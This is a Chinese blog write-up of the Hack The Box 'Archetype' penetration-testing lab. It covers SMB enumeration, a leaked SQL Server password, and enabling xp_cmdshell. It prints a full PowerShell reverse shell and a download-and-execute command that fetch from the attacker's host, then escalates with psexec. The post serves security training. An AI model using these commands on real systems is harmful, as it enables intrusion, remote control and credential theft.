渗透测试靶场Hack The Box-Archetype学习

最新推荐文章于 2024-05-28 21:06:10 发布
最新推荐文章于 2024-05-28 21:06:10 发布
阅读量618 收藏 1
点赞数 2
分类专栏: 笔记 文章标签: 安全 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/XXX26/article/details/118113329
版权

准备

impacket工具
Cobalt Strike

界面

在这里插入图片描述

扫描

拿到ip,先上DJ!先上DJ!
不对不对。。。
先上nmap!先上nmap!
123

利用

可以发现445和1433端口开启
445:通常与SMB服务有关联
1433:常与SQL Server关联
自我觉得445端口成功的可能性更大些,那就从445入手!!
值得检查是否允许匿名访问,因为文件共享通常存储包含密码或其他敏感信息的配置文件。

于是乎使用smbclient进行尝试连接

smbclient -N -L //10.10.10.27/

-N  不用询问密码
-L显示服务器端所分享出来的所有资源

在这里插入图片描述成功!
依次进行连接
发现backups似乎是一个备份的共享

smbclient -N //10.10.10.27/backups

dir //列出文件

在这里插入图片描述有一个 dtsConfig 文件,它是与 SSIS 一起使用的配置文件。

get prod.dtsConfig

cat prod.stsConfig //查看

<DTSConfiguration>
    <DTSConfigurationHeading>
        <DTSConfigurationFileInfo GeneratedBy="..." GeneratedFromPackageName="..." GeneratedFromPackageID="..." GeneratedDate="20.1.2019 10:01:34"/>
    </DTSConfigurationHeading>
    <Configuration ConfiguredType="Property" Path="\Package.Connections[Destination].Properties[ConnectionString]" ValueType="String">
        <ConfiguredValue>Data Source=.;Password=M3g4c0rp123;User ID=ARCHETYPE\sql_svc;Initial Catalog=Catalog;Provider=SQLNCLI10.1;Persist Security Info=True;Auto Translate=False;</ConfiguredValue>
    </Configuration>
</DTSConfiguration>

可以从这个配置文件中读出Windows 用户 ARCHETYPE\sql_svc 的凭据

Password=M3g4c0rp123;User ID=ARCHETYPE\sql_svc

尝试使用Impacket的mssqlclient.py连接到SQL Server

mssqlclient.py -windows-auth ARCHETYPE/sql_svc@10.10.10.27       //mssqlclient.py user ID@ip

在这里插入图片描述成功!
使用SELECT IS_SRVROLEMEMBER(‘sysadmin’)查看当前是否有sysadmin(最高级别)的 SQL Server 权限`,返回1,则表示具有该权限

在这里插入图片描述
这将允许我们启用 xp_cmdshell 并在主机上获得 RCE
依次执行以下代码:

 EXEC sp_configure 'Show Advanced Options', 1;			
 reconfigure;											
 sp_configure;										
 EXEC sp_configure 'xp_cmdshell', 1						
 reconfigure;									

 xp_cmdshell "whoami"

如果成功 则返回archetype\sql_svc,但是,此帐户似乎没有主机的管理权限,但也拥有部分权限。

在这里插入图片描述这时,创建一个shell文件shell.sp1内容如下:

$client = New-Object System.Net.Sockets.TCPClient("10.10.15.174",443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "# ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

在这里插入图片描述注意:ip需要更改为本机ip,端口为后续要监听的端口!
接下来,建立一个小型网络服务器以供shell下载
在同目录下使用命令

python3 -m http.server 80

再开启监听

nc-lvnp 443   //监听443端口

我们现在可以通过 xp_cmdshell 发出下载和执行反向 shell 的命令

xp_cmdshell "powershell "IEX (New-ObjectNet.WebClient).DownloadString(\"http://10.10.15.174/shell.ps1\");"

此处ip为shell接受端ip
执行后:

在这里插入图片描述
可以发现,已经有下载请求,在返回netcat查看,成功!
小插曲:这边之前一直未上线,最后发现原来是443端口没开,导致反弹不回来

ufw disable   //关闭防火墙
ufw allow 443  //开放443

使用type C:\Users\sql_svc\Desktop\user.txt
取得第一个flag!
再使用type C:\Users\sql_svc\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt取得powershell
在这里插入图片描述
这里我们得到adiministrator的密码!!
这表明备份驱动器已使用本地管理员凭据映射。我们可以使用 Impacket 的 psexec.py 来获得特权 shell。
接下来进行提权!
这里用到psexec工具

psexec.py 用户名@ip

psexec.py administrator@10.10.15.174

输入对应密码
在这里插入图片描述连接成功!
此时执行payload 使其在Cobalt Strike上线
最终在desktop位置找到root.txt找到administrator的flag!
在这里插入图片描述

26 .
关注
  • 2
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
hack_the_box:渗透测试学习之路
03-12
hack_the_box 渗透测试学习之路 索引
hackthebox_Archetype
qq_45951598的博客
03-28 1163
文章目录信息收集扫描 信息收集 扫描 根据网站的提示,我们连上vpn的目标机的ip是10.10.10.27 nmap -sC -sV 10.10.10.27 -sC:使用默认脚本进行扫描,等同于–script=default -sV:探测开启的端口来获取服务、版本信息 可以发现,目标开启了135、139、445、1433端口,其中1433是SQL Server数据库默认使用的端口,445是文件共享协议(SMB)默认使用的端口 测试445端口 测试445端口的SMB服务是否支持匿名访问,没有经过权限配
hack the box archetype靶场
最新发布
qq_42754807的博客
05-28 801
hack the box archetype
HackTheBox-Archetype
LYJ20010728的博客
07-27 465
HackTheBox-Archetype连接配置信息收集测试445端口smbclient命令的使用方法 (补充)连接数据库使用数据库调用系统命令获取操作系统普通用户权限提权 连接配置 参考之前写的连接配置,文章链接 信息收集 根据网站提示,目标是10.10.10.27,使用nmap进行扫描 nmap -sS -A 10.10.10.27 发现目标开启了135、139、445、1433端口,其中1433是SQL Server数据库默认使用的端口,445是文件共享协议(SMB)默认使用的端口 测
Hack The BoxArchetype
Ho1aAs‘s Blog
07-22 592
文章目录前言配置代理解题信息搜集SMBSQL Server拿shell*持久化shellUser Owns FlagSystem Owns Flag完 前言 操作基于Kali 2020,参照官方wp 配置代理 Kali连接下发的代理 openvpn xxx.ovpn ifconfig获取当前Kali的ip,10.10.14.*网段的ip 此时靶机可以ping通,靶机ip10.10.10.27 解题 信息搜集 用nmap扫一下 ports=$(nmap -p- --min-rate=1000 -T4
hack the box靶场archetype靶机
zr1213159840的博客
03-19 911
照常打开靶机,看第一个问题 问:主机上的数据库服务时TCP的哪个端口? 答案:1433.可以通过以下命令扫描得出结果 nmap -sV -Pn 10.129.239.163 第二个问题: 问:非管理员的共享的文件夹是什么? 答案:backups。这题是看了提示才知道,提示说可以使用-N -L查看文件夹就能知道了。使用以下命令查看 smbclient -N -L 10.129.239.163 其中以$结尾的文件夹,都是需要管理员权限的。 第三个问题: 问:smb共享文件夹中的文件上,可能的密码是
maven-archetype-quickstart-1.1.jar包下载
06-21
`maven-archetype-quickstart` 就是这样一个archetype,它提供了一个简单的Java应用结构,包含了一个主类和一个测试类,适合初学者或者快速原型开发。 **快速启动Archetype的使用步骤:** 1. **安装Archetype**:...
maven-archetype-webapp-1.4
09-03
更新了配置jdk1.8,web.xml为4.0
maven-archetype-webapp-1.0.jar下载
10-23
2. **创建项目**:在命令行中,使用`mvn archetype:generate`命令,并指定对应的archetype id,如`maven-archetype-webapp`,然后按照提示输入项目信息,如groupId、artifactId和version。 3. **编译与运行**:生成...
maven-archetype-springboot:Spring引导的Maven原型
01-30
Sprint Boot原型 Spring Boot原型将帮助您快速生成Spring Boot项目。 注意! 本项目不是可运行项目,无需克隆到本地,请直接运行脚本 本项目依赖于Lombok插件,请在IDE中安装Lombok Plugin ,了解Lombok请查看: ...
maven-archetype-quickstart-1.1.jar下载
01-10
解决Unable to create project from archetype [org.apache.maven.archetypes:maven-archetype-quickstart:1.1] 1. 下载maven-archetype-quickstart-1.1.jar 文件地址: 2.cmd窗口执行mvn install:install-file -...
hackthebox:hackthebox.eu工作库
03-10
所有练习和包装盒。 欣赏:3 在CWD中工作,并在flag/标记(奖赏)。
hackthebox注册教程
01-20
官方网址:https://www.hackthebox.eu/ hackthebox是一个靶场,听说和vulnhub很像,最近迷上了做靶场,于是就像去hackthebox看看,发现还是注册,而且注册好像还没有那么简单 在首页的最下面有个join,进行点击 发现需要邀请码,上网搜了搜,发现邀请码得靠自己获取,好吧,我接受这个挑战。 使用view-source:https://www.hackthebox.eu/invite,查看源代码 发现提示 发现可疑的js文件:/js/inviteapi.min.js   inviteapi  邀请接口 查看该js 在控制台进行调用,给出了提示,
hack the box archetype 靶场练习
鸥鹭忘机
07-28 1356
连接靶机 首先下载openvpn的配置文件,建议使用UDP协议进行连接,如果使用TCP协议连接,在最后提权的一步提权的时候可能会失败。 总starting point中找到靶机archetype,并点击Join Machine开启靶机。当靶机启动后会显示该靶机的IP地址。但是现在还不能访问该IP地址。需要建立vpn隧道后才能通信。 通过openvpn连接到hack the box的服务器。 openvpn starting_point_rpsate.ovpn 其中starting_point_rpsa
Hack The Box : Starting Point - Archetype
qq_60201815的博客
08-31 412
环境准备 攻击机:kali-linux 靶机:Archetype 需要下载的工具:impacket(GitHub链接:https://github.com/SecureAuthCorp/impacket) 从HTB下载Starting Point VPN,打开kali,利用openvpn连接,出现下图则连接成功。通过ping靶机ip验证是否连接成功。 渗透过程 先进行信息收集,利用nmap扫描目标开放端口和对应服务。 -sC:根据端口识别服务自动调用默认脚本 -sV:扫描目标主.
HTB Hack The Box -- Archetype
Gh0st_1n_The_Shell的博客
09-06 278
要是不知道怎么连接htb的靶机可以查看我的文章 如何连接Hack The Box的靶机?博客园 如何连接Hack The Box的靶机?CSDN 信息收集 先用nmap扫描对方开放了什么服务 攻击 首先比较引人注意的是 445smb服务,1433SQLServer服务 看到445服务就想到永恒之蓝漏洞,然而在这里应该是windows server的版本比较高(2019),所以应该是已经打了永恒之蓝的补丁 我们可以登陆一下smb服务,看看是否需要密码登录,没有经过权限配置可能默认允许所有人无需身份认证来匿名
渗透测试练习靶场hackthebox——Starting Point Archetype攻略
TF0xn的博客
09-15 3028
目录连接配置扫描测试445端口连接数据库获取RCE 连接配置 选择EU或USA后,点击上方Download Connection Pack,下载xxxxx.ovpn,在命令行内键入:openvpn xxxxx.ovpn 如图所示,就连接成功了 扫描 根据网站提示,我们需要扫描10.10.10.27,使用nmap进行扫描:nmap -sC -sV 10.10.10.27 -sC:使用默认脚本进行扫描,等同于–script=default -sV:探测开启的端口来获取服务、版本信息 可以发现,目标开启
hack the box archetype writeup
dlccom的博客
06-27 293
TASK1Q:Which TCP port is hosting a database server?A:1433 TASK2Q:What is the name of the non-Administrative share available over SMB?A:backups TASK3Q:What is the password identified in the file on the SMB share?A:M3g4c0rp123 TASK4Q:What script from I
自定义Maven Archetype之 maven-archetype-archetype
05-25
maven-archetype-archetype 是一个用于创建自定义 Maven Archetype 的 Maven Archetype。 使用 maven-archetype-archetype 创建自定义 Archetype 的步骤如下: 1. 创建一个新的 Maven 项目。 ``` mvn archetype:...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值